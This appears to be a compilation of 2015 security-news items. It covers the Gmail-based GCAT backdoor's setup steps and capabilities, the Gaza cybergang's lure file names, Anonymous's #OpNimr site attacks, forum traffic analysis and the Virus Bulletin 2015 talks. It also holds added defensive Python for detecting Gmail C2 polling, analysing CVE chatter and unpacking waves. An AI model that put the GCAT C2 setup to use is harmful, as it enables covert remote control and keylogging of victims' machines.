Create a dedicated Gmail account
Turn on “Allow less secure apps” under the security settings of the account
Enable IMAP in the account settings
The GCAT backdoor allows the operator to perform the following actions:

Execute a system command
Download a file from a client’s system
Upload a file to the client's system
Execute supplied shellcode on a client
Take a screenshot
Lock the client's screen
Force a check in
Start/stop keylogger
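The claim that Gmail traffic "will never raise suspicions" holds only at the network perimeter; on the endpoint, a C2 built this way shows up as a process that is not a mail client opening IMAP and SMTP connections to Gmail on a fixed polling rhythm. The following is an added illustration (not code from the GCAT project) that scans constructed per-process connection records, as an endpoint sensor such as Sysmon would provide, and flags such actors; the record format, endpoint list and allow-listed mail clients are assumptions.

```python
"""Flag hosts where something other than a mail client is talking to Gmail's IMAP/SMTP endpoints.

Added illustration for the GCAT write-up above; it is not code from the GCAT project.
Assumed input: one tuple per outbound connection, (timestamp, host, process, dst_host, dst_port),
as an endpoint sensor such as Sysmon (network connection events) would record.
All records below are constructed.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# A Gmail-based C2 must reach these: IMAP to poll for tasks, SMTP to return results.
GMAIL_ENDPOINTS = {("imap.gmail.com", 993), ("smtp.gmail.com", 587), ("smtp.gmail.com", 465)}
# Processes allowed to speak IMAP/SMTP to Gmail on a managed workstation (assumption; tune locally).
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}

# Constructed sample: Outlook on WS01 behaving normally, a script interpreter on WS02 polling
# IMAP every 60 s and then sending one SMTP message, a browser on WS03 using the web UI.
SAMPLE_CONNECTIONS = [
    ("2015-09-28T09:00:05", "WS01", "outlook.exe", "imap.gmail.com", 993),
    ("2015-09-28T09:13:41", "WS01", "outlook.exe", "imap.gmail.com", 993),
    ("2015-09-28T09:00:00", "WS02", "python.exe", "imap.gmail.com", 993),
    ("2015-09-28T09:01:00", "WS02", "python.exe", "imap.gmail.com", 993),
    ("2015-09-28T09:02:00", "WS02", "python.exe", "imap.gmail.com", 993),
    ("2015-09-28T09:03:00", "WS02", "python.exe", "imap.gmail.com", 993),
    ("2015-09-28T09:03:02", "WS02", "python.exe", "smtp.gmail.com", 587),
    ("2015-09-28T09:05:30", "WS03", "chrome.exe", "mail.google.com", 443),
]


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S")


def beacon_score(timestamps):
    """Coefficient of variation of the gaps between polls; close to 0 means clockwork polling.
    Returns None when there are too few polls to say anything."""
    if len(timestamps) < 3:
        return None
    ts = sorted(parse_ts(t) for t in timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    m = mean(gaps)
    return pstdev(gaps) / m if m > 0 else None


def find_suspicious(connections, mail_clients=MAIL_CLIENTS, max_cv=0.2):
    """Group Gmail IMAP/SMTP connections by (host, process); report every non-mail-client actor,
    marking those whose IMAP polling is regular enough to look scripted."""
    actors = defaultdict(lambda: {"polls": [], "total": 0, "endpoints": set()})
    for ts, host, proc, dst, port in connections:
        if (dst, port) not in GMAIL_ENDPOINTS:
            continue
        a = actors[(host, proc.lower())]
        a["total"] += 1
        a["endpoints"].add(f"{dst}:{port}")
        if port == 993:  # only the IMAP polls define the beacon rhythm
            a["polls"].append(ts)
    findings = []
    for (host, proc), a in sorted(actors.items()):
        if proc in mail_clients:
            continue
        cv = beacon_score(a["polls"])
        findings.append({
            "host": host,
            "process": proc,
            "connections": a["total"],
            "endpoints": sorted(a["endpoints"]),
            "regular_beacon": cv is not None and cv <= max_cv,
        })
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_CONNECTIONS):
        print(f)
```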
Below is a useful video on the GCAT backdoor:

The World's First $9 Computer is Shipping Today!

Remember Project: C.H.I.P. ?
A $9 Linux-based, super-cheap computer that raised some $2 million beyond a pledge goal of just $50,000 on Kickstarter will soon be in your pockets.
Four months ago, Dave Rauchwerk, CEO of Next Thing Co., used the global crowdfunding platform Kickstarter to back his project C.H.I.P., a fully functioning computer that offers more than you could expect for just $9.
C.H.I.P. stands for "Computer Hardware in Products."
At first, the project looked like it would never end, but here's something exciting: the $9 CHIP computer is shipping.
Yes, Rauchwerk says that the first run of devices will begin to be distributed to early backers within 7-9 days.
Rauchwerk said, "If you backed the [CHIP] project at the Kernel Hacker Backer level on Kickstarter, you'll receive two CHIP computers — the second by mid-October."
Specifications and Capabilities:
CHIP packages:
1GHz R8 ARM processor
4GB of internal flash storage
512MB of DDR3 RAM
Wi-Fi connection
On the input/output side, CHIP features:
A single full-sized USB port
Microphone input
Headphones output
A composite video output that supports older televisions
A micro USB that supports OTG
As it is an open source project, CHIP offers support for thousands of open source applications such as:
LibreOffice package for editing documents and spreadsheets
Chromium for browsing the Web
VLC Media Player for playing audio as well as video
Other programs for coding, torrenting, and photo editing, among others
Also, the team is calling these Alpha C.H.I.P.s, with an initial build root based on Ubuntu. They did not stress the innovation of the alpha CHIP itself, instead offering a complete "How to get started with CHIP" guide that you can follow here.

Quantum Teleportation — Scientists Teleported Quantum Data over 60 Miles

We are just one step closer to creating a Harry Potter or ‘Star Trek’-style Transporter.
However, when we talk about teleportation, we don't typically mean teleporting matter from one place to another as in science-fiction movies.
Rather, teleportation involves capturing the essential information about something, its "quantum state", in order to recreate it exactly someplace else.
A month ago, The Hacker News had reported the battle between Quantum computers and Encryption.
Now, with the development of the technology, NIST scientists have set a new record in the field of “Quantum Teleportation”: they successfully teleported a small amount of data (a ‘qubit’) carried by light particles over a distance of 60 miles (100 km) through a network of optical fiber.
Teleportation transfers the ‘quantum state’ of a photon to another photon residing at a far-off distance, which ends up in the same state.
This is the farthest teleportation over fiber so far, roughly four times the previous record.
Also Read: Entangled Photons on Silicon Chip: Secure Communications & Ultrafast Computers
"We report on Quantum teleportation over optical fiber using four high-detection-efficiency superconducting nanowire single-photon detectors (SNSPDs)," the researchers said in their study.
These Single-Photon Detectors are made possible with advanced research and development by a team of researchers at NIST.
“These SNSPDs make it possible to perform highly efficient multifold photon measurements, allowing us to confirm that the quantum states of input photons were successfully teleported over 100 km of fiber with an average fidelity of 83.7 ± 2.0%”, said the team.
To know how the Quantum Teleportation works, see the image below:
Once quantum computers are fully established, the future of cyber security will lie with them.
Teleportation is a unique phenomenon in both quantum computing and quantum communication. Moreover, the technology outperforms current computers and communication; the following are considered possible achievements by NIST:
Unbreakable encryption
Advanced code-breaking
Want to know more? Download the research paper PDF and see what the future has in-store for us.

Gaza cybergang, where’s your IR team?
28.9.2015 Source: Kaspersky

Gaza cybergang is a politically motivated Arabic cybercriminal group operating in the MENA (Middle East North Africa) region, mainly Egypt, United Arab Emirates and Yemen. The group has been operating since 2012 and became particularly active in Q2 2015.

One interesting new fact about Gaza cybergang activities is that they are actively sending malware files to IT (Information Technology) and IR (Incident Response) staff; this is also obvious from the file names they are sending to victims, which reflect the IT functions or IR tools used in cyber attack investigations.

IT people are known for having more access and permissions inside their organizations than other employees, mainly because they need to manage and operate the infrastructure. This is why getting access to their devices could be worth a lot more than for a normal user.

IR people are also known for having access to sensitive data related to ongoing cyber investigations in their organizations, in addition to special access and permissions enabling them to hunt for malicious or suspicious activities on the network…

The main infection modules used by this group are pretty common RATs: XtremeRAT and PoisonIvy.

Some more interesting facts about Gaza cybergang:

Attackers take an interest in government entities, especially embassies, where security measures and IT operations might not be well established and reliable
Use of special file names, content and domain names (e.g., has helped the group perform better social engineering to infect targets
Increasing interest in targeting IT and IR people, which is clear from most of the recent malware file names used
Other operation names:

Political file names targeting Arabic countries

File name: بوادر خلاف جديد بين الامارات والسعودية.exe

Translation: Indications of disagreement between Saudi Arabia and UAE.exe


Filename: “Wikileaks documents on Sheikh ******* *** *****.exe”


File name: صور فاضحـــــة جدا لبعض العسكريين والقضاة والمستشاريين المصريين.exe

Translation: Scandalous pictures of Egyptian militants, judges and consultants

File name: -> الرئيس الفلسطيني محمود عباس يشتم ماجد فرج.exe

Translation: President Mahmoud Abbas cursing Majed Faraj.exe

File name: “مكالمة مسربة بين القائد العام للقوات المسلحة المصرية صدقي صبحي.exe”

Translation: Leaked conversation with the Egyptian leader of military forces Sodqi Sobhi.exe

File name: tasreb.rar

IT and IR Malware File Names

VCSExpress.exe Hex.exe
Microsoft Log.exe IMP.exe
Win.exe Corss.exe
WinRAR.exe AVR.exe
ccleaner.exe codeblocks.exe
HelpPane.exe Hex_Workshop_Hex_Editor-o.exe
Help.exe Decoded.exe
vmplayer.exe Decrypted.exe
procexp.exe crashreporter.exe
RE.exe WindowsUpdate.exe
PE.exe AVP.exe
PE-Explorr.exe Kaspersky.exe
hworks32.exe Kaspersky Password Manager.exe

Other malware file names

وصية وصور الوالد أتمنى الدعاء له بالرحمة والمغفرة.exe

Military Police less military sexual offenses, drug offenses more.exe


IP addresses and domain names used in the attacks

IP addresses
Malware Hashes

Phishing Hashes


#OpNimr Anonymous targets Saudi websites to stop al-Nimr’s crucifixion

#OpNimr – Anonymous targets Saudi websites to protest against a sentence of death by crucifixion handed down to a 17-year-old for alleged anti-government activities.
The popular collective Anonymous has launched the #OpNimr campaign against the Government of Saudi Arabia to protest against its continuous violation of human rights. The attacks on Saudi websites are a response to the death sentence handed down to 17-year-old Mohammed al-Nimr.
Earlier in September, the Government confirmed Nimr's sentence of death by crucifixion for alleged anti-government activities in 2012; the execution can now be carried out at any moment.
“Ali al-Nimr is at imminent risk of execution for crimes he said he was tortured to ‘confess’ to. He was 17 years old at the time,” states Amnesty International.
Who is Mohammed al-Nimr?

Ali al-Nimr was sentenced to death on 27 May 2014, when he was only 17 years old, for taking part in demonstrations against the government, attacking the security forces, possessing a machine-gun and armed robbery.

The young man is also accused of using a BlackBerry to encourage people to join the protest.

As explained by Amnesty International, the Government based its judgment on confessions extracted under torture. Members of Anonymous have started their campaign calling for Nimr's release; the hacktivists added that he had been denied a lawyer and confirmed the torture.

“Campaigners also claim he was forced to sign a confession, which has formed the basis of the case against him … Now, with all legal avenues exhausted, Ali could be crucified at any moment.”
Ali al-Nimr had been arrested on 14 February 2012, when he was 17 years old, and taken to the General Directorate of Investigations (GDI) prison in Dammam, in the Eastern Province. He was not allowed to see his lawyer and has said that GDI officers tortured him to make him sign a “confession”.

Various reports confirm Nimr's presence at the demonstration, but he was not an activist. Human rights defenders believe that the death sentence of crucifixion is a sort of political “revenge”, because Nimr is a nephew of the Shia cleric and activist Sheikh Nimr Baqr al-Nimr, who is also facing execution because he gave a speech at anti-government protests in Qatif.

“Ali Mohammed al-Nimr, an innocent young teenage boy has been sentenced to death in Saudi Arabia and we will not stand by and watch,” Anonymous said in a statement directed at Saudi Arabia. “Naturally, the sentence was appealed but the appeal hearing was held in secret and apparently dismissed.”

Anonymous announced its offensive via Twitter; it began #OpNimr by targeting a number of government websites. “We hope you listen to us this time and release the young man. You will be treated as a virus and we are the cure.”

The list of targets is long and is available on Pastebin; it includes the Ministry of Justice (, the Ministry of Civil Service (, the General Administration of Education (, PSATRI, Saudi Arabia's technological center for its military and security sectors (; and even Saudi Airlines ( Currently, most of the sites are back up, except for the Ministry of Justice's.

A full list of targeted websites has been published on Pastebin.

“Hundreds of innocent people die each year because of the Saudi Arabian government and they will now be punished for their actions,” the group’s statement said.

Anonymous is also criticizing the silence of many other governments that seem indifferent to the case of al-Nimr; in particular, the hacktivist group blames the British Government for its slackness. Anonymous also criticizes the UN for delegating a key “human rights role” to Saudi Arabia, while cases like this one raise many doubts about the conduct of the government in Riyadh.

Do you feel that the crucifixion is tolerable today? How can the West remain indifferent?

“13 Judges have already approved the death sentence of Ali Mohammed al-Nimr meaning only King Salman bin Abdulaziz Al Saud has to approve it. We cannot and will not allow this to happen. The ministry of justice was taken offline a few days ago and we will continue to do this to other government websites.” is the message of Anonymous to King Salman and the Saudi Arabian Government.

The UN has asked Saudi Arabia to stop the execution. The sentence of crucifixion is as inhumane as it is atrocious: Nimr is set to be beheaded before his body is displayed on a cross in public.

Do you think it right? Do you think it a just punishment to be imposed?

Tracking Hacker Forums with Traffic Analysis

A study conducted by the intelligence firm Recorded Future demonstrates the effectiveness of analyzing hacker forums through traffic-analysis-like techniques.
Hacker forums still exist; hacking communities are in good shape and growing. Hacker forums are normally hard to find, and once you find them you will see them change again.

The most prolific hacker forums are mainly located in Russia, China, Brazil and Arabic countries, so it is normal to face the additional problem of language.

Hacker forums are excellent aggregators: they are a good place to sell or buy exploit kits, to talk about new vulnerabilities and to get opinions (but again, you will not be able to understand them).

A study conducted by the intelligence firm Recorded Future analyzed a hacker forum through traffic-analysis-like techniques, an approach that proved effective even though the authors of the research had no knowledge of the foreign language used in the forum.

“Analysts can detect patterns in timing, forum participant product and vulnerability, etc. and use this knowledge to determine whether forum participants are a threat. Further, such insights can be used to set up appropriate alerting based on forum activity and help network defenders keep pace with developments around vulnerabilities and exploits.” states the analysis published by Recorded Future.
The data presented in the study was collected over 900 days, during which the experts analyzed a Russian hacking forum. The first thing the researchers did was identify the principal language used in the forum: it was Russian.

In a second step they focused the analysis on vulnerability identifiers, the Common Vulnerabilities and Exposures (CVE) numbers. In this way the researchers discovered that the hacker forum focused mainly on CVEs related to Microsoft and Adobe Flash, but surprisingly Linux was also present, most likely because of the Shellshock flaw.

Hacker forums

In terms of vulnerabilities, Heartbleed and Shellshock were at the top, but other important vulnerabilities were on the list too, with heavy discussion about them:

Hacker forum analysis 2

“Patch Tuesday … Exploit Wednesday”

The expression “Patch Tuesday … Exploit Wednesday” was used in a Trend Micro post back in 2006 and described how, after the release of newly discovered vulnerabilities in the Tuesday Microsoft Security Bulletin, an exploit week would start, trying to take advantage of these newly disclosed vulnerabilities. Nowadays this expression is still valid. The next image shows a period starting in March 2013 and ending in September 2015; the blue section is the general forum traffic, the green section is traffic concerning CVEs, and the red one is traffic concerning Microsoft products specifically:

Hacker forum analysis 3

The research also provided interesting information on hackers' habits; for example, participants in hacker forums are latecomers in the day, especially when it comes to traffic concerning vulnerabilities. This data suggests that the participants probably have a different job during the day.

I strongly suggest you read the report; the research demonstrated how hacker forums can be analyzed at the message/post-traffic level. This technique is very efficient because it frees researchers from needing knowledge of the language or from tracking individual posts.
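The post-traffic approach described above needs only two things from each post, its timestamp and any CVE identifier it carries; the body text is never read. The following is an added example (not Recorded Future's code) that applies this to a constructed set of forum posts: it extracts CVE ids, buckets CVE-bearing posts by week, flags weeks whose CVE chatter spikes above the median week (the "Exploit Wednesday" signal), and builds the hour-of-day histogram behind the "latecomers" observation. The posts and the CVE numbers in them are constructed placeholders.

```python
"""Language-agnostic traffic analysis of forum posts, in the spirit of the Recorded Future study above.

Added example, not Recorded Future's code. Only two things are read from each post: its timestamp
and any CVE identifier it contains; the body text is never interpreted. Posts and CVE numbers below
are constructed placeholders, not real forum data.
"""
import re
from collections import Counter
from datetime import datetime, timedelta
from statistics import median

CVE_RE = re.compile(r"\bCVE-(\d{4})-(\d{4,})\b", re.I)
TS_FMT = "%Y-%m-%dT%H:%M:%S"

# Constructed sample: one CVE post per week as a baseline, then a burst in the week of a
# (hypothetical) Patch Tuesday, 2015-09-08. The Russian text is never parsed, only scanned for ids.
POSTS = [
    ("2015-08-12T21:15:00", "Кто-нибудь смотрел CVE-2015-1111?"),
    ("2015-08-19T22:40:00", "Старая тема, CVE-2014-2222 до сих пор встречается"),
    ("2015-08-26T10:05:00", "Вопрос по cve-2015-3333"),
    ("2015-09-02T23:10:00", "Ещё раз про CVE-2014-2222"),
    ("2015-09-08T20:30:00", "Вышел бюллетень, смотрите CVE-2015-4444"),
    ("2015-09-09T21:05:00", "CVE-2015-4444 и CVE-2015-5555 из того же бюллетеня"),
    ("2015-09-09T22:50:00", "Обсуждение CVE-2015-5555"),
    ("2015-09-10T21:20:00", "Продолжение по CVE-2015-4444"),
    ("2015-09-16T14:00:00", "Оффтоп без ссылок"),
]


def extract_cves(text):
    """Return normalised CVE ids found in a post, regardless of case."""
    return [f"CVE-{y}-{n}" for y, n in CVE_RE.findall(text)]


def week_start(ts):
    """Week bucket for a timestamp, keyed by the Monday of that week (ISO date string)."""
    dt = datetime.strptime(ts, TS_FMT)
    return (dt - timedelta(days=dt.weekday())).date().isoformat()


def weekly_cve_posts(posts):
    """Number of posts per week that mention at least one CVE."""
    return dict(Counter(week_start(ts) for ts, text in posts if extract_cves(text)))


def spike_weeks(weekly_counts, factor=2.0):
    """Weeks whose CVE chatter exceeds `factor` times the median week."""
    if not weekly_counts:
        return []
    baseline = median(weekly_counts.values())
    return sorted(w for w, c in weekly_counts.items() if c > factor * baseline)


def top_cves(posts, n=3):
    """Most-discussed identifiers, counted once per post so one chatty post cannot dominate."""
    return Counter(cve for _, text in posts for cve in set(extract_cves(text))).most_common(n)


def cve_post_hours(posts):
    """Hour-of-day histogram of CVE posts; a late-evening peak is the 'latecomers' pattern."""
    return Counter(datetime.strptime(ts, TS_FMT).hour for ts, text in posts if extract_cves(text))


if __name__ == "__main__":
    weekly = weekly_cve_posts(POSTS)
    print("weekly CVE posts:", weekly)
    print("spike weeks:", spike_weeks(weekly))
    print("top CVEs:", top_cves(POSTS))
    print("hours:", sorted(cve_post_hours(POSTS).items()))
```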

“Analysts can detect patterns in timing, spikes in forum participation, mentions of products or vulnerabilities, etc. and use this knowledge to determine whether forum participants are a threat.” states Recorded Future.

About the Author Elsio Pinto

Elsio Pinto is at the moment the Lead McAfee Security Engineer at Swiss Re, but he also has knowledge in the areas of malware research, forensics and ethical hacking. He has previous experience in major institutions, the European Parliament being one of them. He is a security enthusiast and tries his best to pass on his knowledge. He also runs his own blog.

Cyber attack overall cost suffered last year by businesses is $315b

A recent survey conducted by Grant Thornton revealed that one in six businesses has experienced a cyber attack in the past twelve months.
It is always interesting to report the findings of studies on the impact of cybercrime worldwide; today I want to present the results of research conducted by the business advisory firm Grant Thornton International.

Experts at Grant Thornton International interviewed 2,500 business leaders in 35 countries, discovering that 15% of the surveyed companies had been targeted by attackers over the past 12 months.

According to the findings of the International Business Report (IBR) published by Grant Thornton International, the cyber attacks cost businesses £200bn ($315bn) over the past 12 months.

In line with data provided by other security firms, the financial services sector was the most exposed to the risk of cyber attack: 74% of surveyed leaders confirmed that online attacks are a threat to their business.

“Grant Thornton’s research reveals that the sector most concerned by the threat of a cyber attack is financial services (74% of business say it is a threat) – this is also the sector with the joint-highest recorded instances of cyber crime (26%). At the other end of the spectrum, only 10% of transport firms globally have reported a cyber attack in the past 12 months and just 27% perceive it as a threat.” states Grant Thornton.

Organizations in Europe and North America are privileged targets for hackers, but thanks to greater awareness of cyber threats, the estimated loss of business revenues was lower in the EU ($62.3bn) and North America ($61.3bn) than in APAC ($81.3bn).

cyber attack loss business revenues Grant Thornton IBR 2015

A successful cyber attack will have a significant impact on the organization with an estimated cost of around 1.2% of business revenues.

“Cyber attacks are an increasingly significant danger for business. Not just cost in a financial sense, but serious reputational damage can be inflicted if attacks undermine customer confidence: just ask Ashley Madison. Despite this, nearly half of firms still lack a strategy to deal with the cyber threat.” said Paul Jacobs, Global Leader of Cyber Security at Grant Thornton.

“Businesses cannot afford to be behind the curve on this threat. Cyber attacks can strike without warning and sometimes without the victim being immediately aware. The pressure from customers and clients cannot be ignored. In this digital age, rigorous security and privacy is expected. If this cannot be guaranteed the ultimate risk is they will simply go elsewhere.”

The principal problem, in my opinion, is the lack of a security strategy in many organizations; only 52% of those surveyed confirmed they have a strategy in place.

Companies lack a strong commitment to cyber security from senior management, and the absence of a proper security posture exposes their business to serious risks.

The reason most often given by businesses for implementing a cyber security strategy is client/customer demand (44%).

Virus Bulletin 2015

At this time of year I’m usually getting ready to travel to Virus Bulletin, maybe the year’s most important conference for an anti-malware researcher. Sadly, for the second year running I’m unable to attend, though it would have been nice to see Prague again – the conference is at the Clarion Congress Hotel – and the networking with other researchers is always an attraction. It’s also something of a milestone in that for the first time since 2007, I don’t have a paper to present there. But maybe 15 VB papers since 1997 is enough for one lifetime. :)
The agenda looks as good as ever, though, with a keynote from Ross Anderson to kick things off.
Other presentations that caught my eye included Does prevalence matter? Ranking anti-malware products by potential victim impact by Microsoft’s Holly Stewart and three of the guys from AV-Comparatives, a Small Talk on The Clean Software Alliance, security, and the future of unwanted behaviours, and a paper on Effectively testing APT defences by Simon Edwards, Richard Ford, and Gabor Szappanos.
And, as most years, there is plenty of representation from my colleagues at ESET. (In the case of papers with more than one author, all authors are listed, but they won’t necessarily all be onstage for the presentation, of course.)
ESET’s Stephen Cobb: Sizing cybercrime: incidents and accidents, hints and allegations
Wednesday 30th September between 12.00 and 12.30 in the Red Room.

Cybercrime certainly feels like a major threat to network security. Criminals routinely use networks to steal data, defraud companies and consumers, and disrupt normal business operation in both public and private sectors. But just how big a threat is cybercrime? For a problem long characterized as both huge and existential by politicians and industry pundits, cybercrime has largely gone unmeasured, if ‘measure’ is taken to mean ‘ascertain the size of the problem using sound scientific methodology’.
This presentation reviews the cybercrime literature, both commercial and academic, for answers as to why we lack reliable, consistent, longitudinal data on the size and scope of the cybercrime problem. The following issues are addressed:
The implications of government failure to measure cybercrime to the extent it measures other crimes.
The problems inherent in outsourcing cybercrime surveys to the private sector.
The three main categories of research deficiency in cybercrime studies.
The inherent complexities of measuring cybercrime.
The implications of weak cybercrime statistics for the information security effort.
The paper concludes with suggestions as to how the current dearth of reliable data may be remedied and a call to action to educate the industry on the appropriate use of available data.
SSL man-in-the-middle secure solution
At the same time, there’s a talk by ESET’s Righard Zwienenberg, Symantec’s Mark Kennedy and Professor Igor Muttik of Intel Security: Wednesday 30 September 12:00 – 12:30, Small Talk.

More and more HTTP traffic is being encrypted (HTTPS). This increases security by preventing listening into the conversation, but it also creates a problem for security products that need access to that information as well. To address this, many security companies implement a ‘man-in-the-middle’ protocol, where they broker the keys from both ends of the conversation, and thus are able to inspect the content.
For some websites now — and perhaps many more in the future — the client is checking to verify that the SSL certificate is routed to the server. However, these checks will fail because the certificate returned by the security product will not match the server’s domain. We see some of these failures in the field today, and more will likely follow.
The IEEE Industry Connections Security Group is working on a secure solution to this growing problem. We will show where we are, and discuss how we will move forward towards an industry solution.
ESET’s Andrew Lee presents in the company of Morton Swimmer of Trend Micro and Nick FitzGerald, nowadays an independent researcher: The Kobayashi Maru dilemma
Wednesday 30 September 15:00 – 15:30, Red room.

How do you win a game when the rules don’t let you?
You change the rules!
In the computer security field, one possible game changer is aggressively fighting back. Star Trek’s fictional James T. Kirk changed the Kobayashi Maru simulation from a no-win situation to one where a winning solution, but can we do the same? What are the ethical and legal challenges?
The dilemma stems from the problem that fighting back will have consequences, sometimes technical, sometimes ethical, sometimes legal. In a world where pointing NMAP at another’s host is considered more than just impolite, using an exploit to gain control of an alleged C&C server, which is probably illegal in most countries anyway, is stepping well over the line. But not changing the rules means we persist in our course of staying one step behind the criminals. This is not satisfactory as it looks like everyone is losing in this scenario – except the criminals.
In this paper we will present various real and hypothetical scenarios of fighting back. For example: sinkholing; SSH honeypots that counter attack (yes, this is real); abusing open directories; hacking C&C servers; taking over botnets by either hijacking the C&Cs or buying them; shutting down DHT-based botnets; modifying phishing pages so they no longer work; using DDoS attacks against criminal infrastructure; and so on. We are not advocating any of these aggressive methods, and what we lay out in the paper is unlikely to be exhaustive. However, we will discuss where we, as the authors, see the boundaries of what we can do so that the readers come away with a better ethical framework for their own activities.
This discussion is long overdue as some mild forms of aggressive defensive tactics have already been tried, and some common daily working activities of security analysts may have potential legal consequences where few currently imagine there might even be ethical considerations. In some cases, the law is in conflict with what may seem like ‘technical common sense’. However, these laws usually have solid foundations and being seen to violate them, even if there are no likely legal consequences, can have negative effects on cooperation with other companies and/or law enforcement agencies, or on public perception. We see this not as a final statement on the matter, but the beginning of a discussion that should accompany our actions in this new frontier.
WaveAtlas: surfing through the landscape of current malware packers
Wednesday 30 September 16:30 – 17:00, Green room.
Joan Calvet ESET
Fanny Lalonde Lévesque École Polytechnique de Montréal
Erwann Traourouder École Polytechnique de Montréal
François Menet École Polytechnique de Montréal
José M. Fernandez École Polytechnique de Montréal
Jean-Yves Marion Université de Lorraine
Obfuscation techniques have become increasingly prevalent in malware programs, employed as tools to thwart reverse engineering efforts or to evade signature-based detection by security products. Among the most popular methods, the use of packers – which are programs that transform an executable file’s appearance without affecting its semantic execution – is now widely adopted by malware authors. However, despite the rise in the number of malicious programs distributed with packers, we still lack a global picture of their current use. What kind of packers protect malware nowadays? Is there a common model? Previous attempts, based on static database-signature tools, failed to build an accurate picture of the use of packers by malware, their main limitation being that static analysis says nothing about the actual behaviour of the packers and, due to its static nature, misses run-time features.
In this paper, we present WaveAtlas, a novel framework designed to map the code used by packers. Using a dynamic analysis approach, it reconstructs in a nutshell the structure of the code modification tree where the root is the packed code and packer, and the nodes represent snippets of code extracted in successive ‘waves’. We report on a large-scale experiment conducted on a representative sample of thousands of pieces of self-modifying malicious code. Our results allowed us to successfully identify common features of malware packers, ranging from their self-modification code usage to exotic choices of machine instructions. In particular, we were able to confirm some commonly held beliefs regarding the use of packers by malware writers. For example, a malicious payload (e.g. code including network callbacks) is typically present in the last or penultimate wave. Furthermore, the number of waves is relatively small and the structure of the trees relatively simple, indicating that malware authors are probably using simpler tools and parameters as a compromise between stealth and efficiency.
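As an added illustration of the wave idea (this is not WaveAtlas's own code, whose instrumentation runs on real executables), the following Python reconstructs waves from a constructed instruction trace. The event format, the addresses and the API name are invented for the example, and the rule applied (code bytes written by an instruction of wave k belong to wave k+1) is a simplification of the paper's code modification tree; the final check mirrors the observation above that the payload's network callback tends to sit in the last or penultimate wave.

```python
"""Wave reconstruction from a self-modifying-code trace (added example, not WaveAtlas)."""
from collections import defaultdict


def reconstruct_waves(trace):
    """Group executed instructions into waves.

    Trace events (constructed format, tuples):
      ("exec", pc)          instruction at pc executed
      ("write", pc, dst)    instruction at pc wrote a code byte at dst
      ("api", pc, name)     instruction at pc called an API (e.g. a network callback)
    Rule: an address never written at run time belongs to wave 0; an address
    written by an instruction of wave k belongs to wave k+1.
    """
    written_by_wave = {}          # dst address -> wave of the instruction that wrote it
    waves = defaultdict(set)      # wave number -> executed addresses
    api_calls = defaultdict(list)  # wave number -> API names called from it

    def wave_of(pc):
        return written_by_wave.get(pc, -1) + 1

    for event in trace:
        kind, pc = event[0], event[1]
        if kind == "exec":
            waves[wave_of(pc)].add(pc)
        elif kind == "write":
            written_by_wave[event[2]] = wave_of(pc)
        elif kind == "api":
            api_calls[wave_of(pc)].append(event[2])
        else:
            raise ValueError(f"unknown trace event {kind!r}")

    return {
        "waves": {w: sorted(addrs) for w, addrs in sorted(waves.items())},
        "api_calls": dict(api_calls),
        "wave_count": max(waves) + 1 if waves else 0,
    }


def payload_wave(result, marker="connect"):
    """Wave in which the first call to `marker` was made, or None if never called."""
    for wave, names in sorted(result["api_calls"].items()):
        if marker in names:
            return wave
    return None


# Constructed toy trace: a two-layer packer on a tiny address space.
SAMPLE_TRACE = [
    ("exec", 0x1000),            # wave 0: packer stub starts
    ("exec", 0x1001),
    ("write", 0x1001, 0x2000),   # stub decrypts a second stage into 0x2000-0x2002
    ("write", 0x1001, 0x2001),
    ("write", 0x1001, 0x2002),
    ("exec", 0x1002),            # jump into the decrypted code
    ("exec", 0x2000),            # wave 1: second stage runs
    ("exec", 0x2001),
    ("write", 0x2001, 0x3000),   # it in turn unpacks the final payload
    ("write", 0x2001, 0x3001),
    ("exec", 0x2002),
    ("exec", 0x3000),            # wave 2: payload
    ("exec", 0x3001),
    ("api", 0x3001, "connect"),  # network callback observed in the last wave
]

if __name__ == "__main__":
    result = reconstruct_waves(SAMPLE_TRACE)
    for wave, addrs in result["waves"].items():
        print(f"wave {wave}: {[hex(a) for a in addrs]}")
    print("payload wave:", payload_wave(result), "of", result["wave_count"])
```

On this trace the stub, the intermediate layer and the payload fall into three waves, and the only network API call is made from the last one. A real implementation also has to cope with code that rewrites itself repeatedly and with writes from several waves into the same region; that is where the tree structure in the paper comes from.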
ESET’s Marcin Hartung tells you how to Unpack your troubles: .NET packer tricks and countermeasures
Wednesday 30 September 17:00 – 17:30, Green room.

Nowadays, .NET samples are increasingly common, necessitating specialized techniques for processing and analysis, especially when obfuscation is used: .NET packers have many tricks up their sleeves, but fortunately we do too.
A skilled researcher can often glance inside ‘good old-fashioned’ native executables and see what they do despite protection with strong packers. However, .NET files are different.
Analysing clean .NET files with dedicated tools shows us almost everything, but if the file is obfuscated we sometimes see nothing at all. In .NET analysis we face one main obstacle — complex runtime technology which introduces some level of abstraction and therefore makes debugging harder.
This paper combines analysis of methods collected from various sources with techniques originating with the author’s own experience, in order to improve sample management. It describes simple tricks for getting strings after packer decryption or logging APIs used as well as some more sophisticated examples.
All the problems addressed relate to real cases often encountered in the context of commercial packers or of custom protectors used by malware.
Such tricks can be used for single analyses for adding breakpoints in locations of interest or as building blocks for constructing a powerful tool for analysing .NET samples.
Robert Lipovsky and Anton Cherepanov, both from ESET, present their paper Operation Potao Express: analysis of a cyber-espionage toolkit
Thursday 1 October 14:00 – 14:30, Green room.

With the geopolitical situation in Ukraine still in turmoil, targeted cyber-espionage attacks in the country continue to escalate. One of the attacks we analysed in depth last year was BlackEnergy (a.k.a. Sandworm). In 2015, one of the malware families we have been focusing on is another threat mostly active in post-Soviet countries: Potao.
Win32/Potao is a trojan that has recently been used (the most recent attacks were detected in July 2015) to spy on high-value targets such as Ukrainian government and military entities and one of the major Ukrainian news agencies. Other countries targeted by this universal cyber-espionage toolkit include Russia, Georgia and Belarus. In Russia, for example, the malware was used to spy on members of MMM, a popular financial pyramid scheme.
One of the most interesting discoveries during our Potao research was the connection to a Russian version of the popular open-source encryption software TrueCrypt. We discovered a website that has been serving a Russian-language-localized version of the TrueCrypt application that also contains a backdoor, aimed at specific targets. In a few cases the trojanized TrueCrypt was used to install the Potao trojan.
In addition to an overview of the attack campaigns using Potao or the trojanized TrueCrypt (detected by ESET as Win32/FakeTC), we will also present the highlights of our detailed technical analysis of both trojans.
